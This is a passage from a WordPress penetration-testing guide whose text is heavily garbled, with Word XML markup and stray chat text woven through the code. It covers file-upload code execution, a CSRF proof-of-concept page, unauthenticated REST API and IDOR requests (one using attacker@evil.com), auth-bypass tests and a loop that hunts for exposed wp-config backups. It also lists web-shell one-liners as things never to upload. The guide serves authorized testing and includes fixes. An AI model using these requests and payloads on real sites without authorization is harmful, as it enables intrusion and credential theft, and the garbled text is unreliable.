Confirmed (Proceed Cautiously):**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````bash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Create a harmless PHP info file for PoC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cat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&gt; poc_phpinfo.php &lt;&lt; 'EOF'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&lt;?php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// PoC file for demonstrating arbitrary PHP execution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// Engagement: WordPress Pentest - target.com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// Date: 2026-01-14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phpinfo(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//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This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file will be deleted immediately after screenshot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?&gt;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EOF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Upload and test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-X POST https://target.com/wp-content/plugins/vulnerable-plugin/upload.php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-F "file=@poc_phpinfo.php"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-b cookies.txt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 Access and screenshot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firefox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https://target.com/wp-content/uploads/2026/01/poc_phpinfo.php &amp;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Take screenshot showing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phpinfo(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 output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IMMEDIATELY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DELETE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curl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-X POST https://target.com/wp-content/plugins/vulnerable-plugin/delete.php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-d "file=poc_phpinfo.php" \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-b cookies.txt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#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Or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manually via admin panel/SSH if available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**What NOT to Do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````php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// NEVER upload actual shells like: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&lt;?php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system($_GET['cmd']); ?&gt;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&lt;?php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eval($_POST['code']); ?&gt;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// NEVER upload reverse shells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// NEVER upload backdoors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// NEVER upload web-based file managers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// Even if the client says "test everything," uploading functional attack tools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// crosses the line from pentesting to potentially illegal hacking activity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**Evidence Documentation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````markdown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## Finding: Unrestricted File Upload Leading to RCE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### Vulnerability Details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Plugin "Vulnerable Uploader" v1.0.2 allows authenticated users to upload PHP files without proper validation or execution restrictions.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### Proof of Concept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**Step 1:** Authenticate as low-privilege user (Contributor role)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**Step 2:** Upload PHP file via plugin interface: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```http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POST /wp-content/plugins/vulnerable-uploader/upload.php HTTP/1.1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Host: target.com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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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------WebKitFormBoundary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Content-Disposition: form-data; name="file"; filename="test.php"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Content-Type: application/x-php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lastRenderedPageBreak/>
        <w:t>&lt;?php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phpinfo(); ?&gt;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------WebKitFormBoundary--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**Step 3:** Access uploaded file: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GET /wp-content/uploads/2026/01/test.php HTTP/1.1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Host: target.com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Response: Full PHP configuration displayed (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phpinfo(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 executed)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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Attacker can execute arbitrary PHP code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Full server compromise possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Database credentials accessible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Potential lateral movement to internal network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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Implement strict file type validation (whitelist only)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Rename uploaded files with random names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Store uploads outside webroot if possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Disable PHP execution in upload directories via .htaccess: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apache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&lt;FilesMatch "\.php$"&gt;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Order Allow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,Deny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Deny from all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&lt;/FilesMatch&gt;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**Note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 Exploitation limited to phpinfo() for PoC. Uploaded test file was immediately deleted.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### 8.4 CSRF Exploitation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**Scenario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 Admin function lacks CSRF protection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**Creating a CSRF PoC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````html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&lt;!--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csrf_poc_plugin_settings.html --&gt;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lastRenderedPageBreak/>
        <w:t>&lt;!DOCTYPE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html&gt;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html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head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title&gt;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CSRF PoC - Plugin Settings Modification&lt;/title&gt;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&lt;/head&gt;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body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&lt;h1&gt;CSRF Proof of Concept&lt;/h1&gt;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&lt;p&gt;&lt;strong&gt;Vulnerability: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&lt;/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strong&gt; Plugin "Example Plugin" admin settings can be modified via CSRF&lt;/p&gt;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&lt;h2&gt;Attack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Scenario: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&lt;/h2&gt;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&lt;p&gt;If an administrator visits this page while logged into WordPress, their plugin settings will be silently modified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.&lt;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/p&gt;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&lt;h3&gt;PoC Form (Auto-submits on page load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):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&lt;/h3&gt;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&lt;form action="https://target.com/wp-admin/admin-post.php" method="POST" id="csrf_form"&gt;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&lt;input type="hidden" name="action" value="update_example_plugin_settings" /&gt;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&lt;input type="hidden" name="api_key" value="ATTACKER_CONTROLLED_VALUE" /&gt;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&lt;input type="hidden" name="enable_public_access" value="1" /&gt;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&lt;input type="submit" value="Submit (click only for manual test)" /&gt;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&lt;/form&gt;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&lt;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script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&gt;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// Auto-submit for demonstration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//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In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real attack, this would be triggered automatically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// For PoC, we comment this out and require manual click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   //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document.getElementById(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'csrf_form').submit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Continuer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10:20 AM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(); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:after="0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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>hr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; &lt;p&gt;&lt;em&gt;Note: This is a proof of concept for authorized penetration testing. Auto-submit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> disabled.&lt;/em&gt;&lt;/p&gt; &lt;/body&gt; &lt;/html&gt; ```` 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b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Testing the CSRF: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Step 1: Host the PoC HTML file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- On your testing server OR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lastRenderedPageBreak/>
        <w:t>- As a local file (file:///path/to/csrf_poc.html)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Step 2: While logged into target WordPress as admin, visit the PoC page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Step 3: Click the submit button manually (since auto-submit is disabled for safety)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Step 4: Verify settings were changed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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-admin/admin.php?page=example-plugin-settings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-b admin_cookies.txt | grep "api_key"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Expected: api_key value is now "ATTACKER_CONTROLLED_VALUE"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**Evidence Collection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□ CSRF PoC HTML file □ Screenshot of form in browser □ Before/after screenshots of admin settings □ HTTP requests showing lack of nonce/token □ Video demonstrating successful CSRF (optional but impactful)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**Severity Rating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**HIGH**: CSRF on admin functions (user creation, settings modification)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**MEDIUM**: CSRF on content modification (posts, comments)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 **LOW**: CSRF on low-impact actions (profile updates of own account)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### 8.5 Insecure REST API Endpoints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**Common Vulnerability: Unauthenticated Data Modification**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```bash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Scenario: Custom plugin exposes REST API endpoint that allows data modification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lastRenderedPageBreak/>
        <w:t>Step 1: Enumerate custom endpoints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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-json/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> | jq -r '.routes | keys[]' | grep -v "^/wp" &gt; custom_endpoints.txt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Example finding: /wp-json/custom-plugin/v1/update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Step 2: Test without authentication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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-json/custom-plugin/v1/update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-H "Content-Type: application/json" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-d '{"setting":"value","id":1}' </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/rest_api_unauth_test.json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Step 3: Check if modification succeeded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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-json/custom-plugin/v1/get?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> | jq .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 xml:space="preserve">If data was modified without authentication, it's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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a vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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**Testing Authentication Bypass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```bash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Test 1: No authentication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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-json/custom-plugin/v1/admin-function</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-d '{"action":"create_user","username":"hacker"}' </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/rest_no_auth.json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Test 2: With low-privilege authentication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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-json/custom-plugin/v1/admin-function</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-H "Authorization: Bearer LOW_PRIVILEGE_TOKEN" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-d '{"action":"create_user","username":"hacker"}' </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/rest_low_priv.json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lastRenderedPageBreak/>
        <w:t>Test 3: IDOR - can user A modify user B's data?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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-json/wp/v2/users/2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-H "Authorization: Bearer USER_A_TOKEN" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-d '{"email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>attacker@evil.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">"}' </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/rest_idor.json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**Evidence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Finding: Unauthenticated REST API Endpoint Allows Data Modification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Endpoint: /wp-json/custom-plugin/v1/update Method: POST Authentication Required: NO (vulnerability)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PoC Request: POST /wp-json/custom-plugin/v1/update HTTP/1.1 Host: target.com Content-Type: application/json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{"setting":"malicious_value","id":1}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Response: {"success"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>:true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>,"message":"Setting updated"}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Impact: Attacker can modify plugin settings without authentication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Severity: HIGH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### 8.6 Plugin Authentication Bypass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**Scenario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 Plugin has logic flaw in authentication check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**Common Patterns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```php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// Vulnerable code pattern (conceptual): if ($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>'admin'] == 'true') { // Admin functionality }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// Or: if (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>isset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>$_COOKIE['admin_verified'])) { // Admin functionality }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**Testing for Auth Bypass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```bash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Test 1: Parameter manipulation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lastRenderedPageBreak/>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s "</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-content/plugins/vulnerable-plugin/admin.php?admin=true</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/auth_bypass_param.html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Check if admin functionality is accessible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grep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i "admin panel|dashboard|settings" evidence/auth_bypass_param.html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Test 2: Cookie manipulation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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-content/plugins/vulnerable-plugin/admin.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-H "Cookie: admin_verified=1" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/auth_bypass_cookie.html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Test 3: Header manipulation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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s "</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-content/plugins/vulnerable-plugin/admin.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-H "X-Admin: true" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-o evidence/auth_bypass_header.html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---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## 9. FILE SYSTEM &amp; CONFIGURATION ISSUES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### 9.1 wp-config.php Exposure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**Critical File - Never Should Be Accessible**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```bash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Test direct access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curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-config.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o evidence/wp-config-direct.txt -w "%{http_code}\n"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Expected: 403 Forbidden or blank (PHP executes, outputs nothing)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Finding: If you see PHP code or database credentials, CRITICAL vulnerability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lastRenderedPageBreak/>
        <w:t>Test common backup locations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for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in wp-config.php.bak wp-config.php.old wp-config.php~ wp-config.txt wp-config.php.save; do code=(curl -s -o /tmp/wpconfig_ file -w "%{http_code}" </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/$file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">) echo "$code - $file" if [ "$code" == "200" ]; then echo "[!] CRITICAL: wp-config backup exposed!" cp /tmp/wpconfig_file evidence/wp-config_exposed_ file fi done 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**What to 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Look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 xml:space="preserve"> For in Exposed wp-config.php:**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```php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// Database credentials define( 'DB_NAME', 'wordpress_db' ); define( 'DB_USER', 'wp_user' ); define( 'DB_PASSWORD', 'super_secret_password' ); define( 'DB_HOST', 'localhost' );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 xml:space="preserve">// Security keys (can be used to forge cookies/sessions) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
